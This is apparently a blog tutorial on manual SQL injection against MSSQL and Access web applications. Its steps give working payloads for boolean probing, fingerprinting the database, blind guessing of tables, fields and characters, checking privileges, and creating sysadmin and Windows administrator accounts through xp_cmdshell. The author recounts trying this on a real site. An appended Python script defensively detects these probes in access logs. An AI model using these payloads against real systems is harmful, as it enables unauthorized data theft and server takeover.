1. Determine whether there is an injection point
and 1=1
and 1=2
Testing for injection works the same way as for any other database.
2. Preliminary check whether the database is MSSQL
and user>0
3. Determine the database system
and (select count(*) from sysobjects)>0    (MSSQL)
and (select count(*) from msysobjects)>0   (Access)
4. When the injection parameter is a string
' and [query condition] and '='
5. When the search parameter is not filtered
' and [query condition] and '%25'='
6. Guess the table name
and (select count(*) from [table name])>0
This step is painful: this site had more than 300 tables, and I did not manage to guess the name; even the tool sqlmap did not finish and only returned errors. Once the table name is guessed correctly, the next step is guessing the fields. MSSQL and Access are actually quite similar, so what you learn here can be extrapolated. These are the steps and statements; I am showing them to everyone mainly because this site was so painful. Tool usage will be introduced in a later tutorial. The point here is to learn the principle: injecting only with tools means nothing. Learn the principle, develop your own ideas, and then write your own tools; that is where the sense of accomplishment comes from.
7. Guess the field names
and (select count(field name) from table name)>0
8. Guess the length of the record in the field
and (select top 1 len(field name) from table name)>0
9. (1) Guess the ASCII value of the field, one character at a time (Access; N is the character position)
and (select top 1 asc(mid(field name, N, 1)) from table name)>0
(2) Guess the ASCII value of the field, one character at a time (MSSQL; N is the character position)
and (select top 1 unicode(substring(field name, N, 1)) from table name)>0
10. Test the permission structure (MSSQL)
and 1=(select is_srvrolemember('sysadmin'));--
and 1=(select is_srvrolemember('serveradmin'));--
and 1=(select is_srvrolemember('setupadmin'));--
and 1=(select is_srvrolemember('securityadmin'));--
and 1=(select is_srvrolemember('diskadmin'));--
and 1=(select is_srvrolemember('bulkadmin'));--
and 1=(select is_member('db_owner'));--
11. Add an MSSQL account and a system account
exec master.dbo.sp_addlogin username;--
exec master.dbo.sp_password null,username,password;--
exec master.dbo.sp_addsrvrolemember sysadmin username;--
exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
exec master.dbo.xp_cmdshell 'net user username password /add';
exec master.dbo.xp_cmdshell 'net localgroup Administrators username /add';--
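As an added defensive example (not part of the original tutorial), the following Python script scans web-server access log lines for the probe statements used in steps 1 to 11 above and labels which phase of the manual injection each request resembles. The combined log format, the signature grouping and the sample log lines are assumptions constructed for this example.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Signatures derived from the probe statements in this tutorial, grouped by the
# phase of the manual injection they belong to (grouping chosen for this example).
SIGNATURES = {
    "tautology_probe": re.compile(r"\band\s+1\s*=\s*[12]\b|\band\s+user\s*>\s*0", re.I),
    "db_fingerprint": re.compile(r"\bfrom\s+(?:sysobjects|msysobjects)\b", re.I),
    "schema_guess": re.compile(r"select\s+(?:top\s+1\s+)?(?:count|len|asc|unicode)\s*\(", re.I),
    "privilege_check": re.compile(r"\bis_(?:srvrolemember|member)\s*\(", re.I),
    "account_takeover": re.compile(r"\b(?:xp_cmdshell|sp_addlogin|sp_password|sp_addsrvrolemember)\b", re.I),
}

# Apache/IIS-style combined log line: client IP and the request target are what we need.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(target: str) -> list[str]:
    """Return the injection phases whose signatures appear in a decoded request target."""
    # Decode twice so double-encoded probes ('%2527' -> '%27' -> "'") are caught too.
    decoded = unquote_plus(unquote_plus(target))
    return [phase for phase, pat in SIGNATURES.items() if pat.search(decoded)]

def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Parse log lines and report (ip, target, phases) for requests carrying probe signatures."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable request line; skip rather than guess
        phases = classify(m["target"])
        if phases:
            hits.append((m["ip"], m["target"], phases))
    return hits

# Constructed sample log: one normal request followed by probes shaped like steps 1, 3, 10 and 11.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12%20and%201=(select%20is_srvrolemember('sysadmin'));-- HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=12;exec%20master.dbo.xp_cmdshell%20'net%20user' HTTP/1.1" 500 310
"""

if __name__ == "__main__":
    for ip, target, phases in scan(SAMPLE_LOG):
        print(f"{ip} {','.join(phases)} {target}")
```

A single client hitting several phases in sequence, as in the sample, is the pattern worth alerting on; a lone tautology probe is often just a scanner.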
This article is from the "RedBull" blog; please contact the author before reproducing it.
SQL Server Manual Injection Tutorial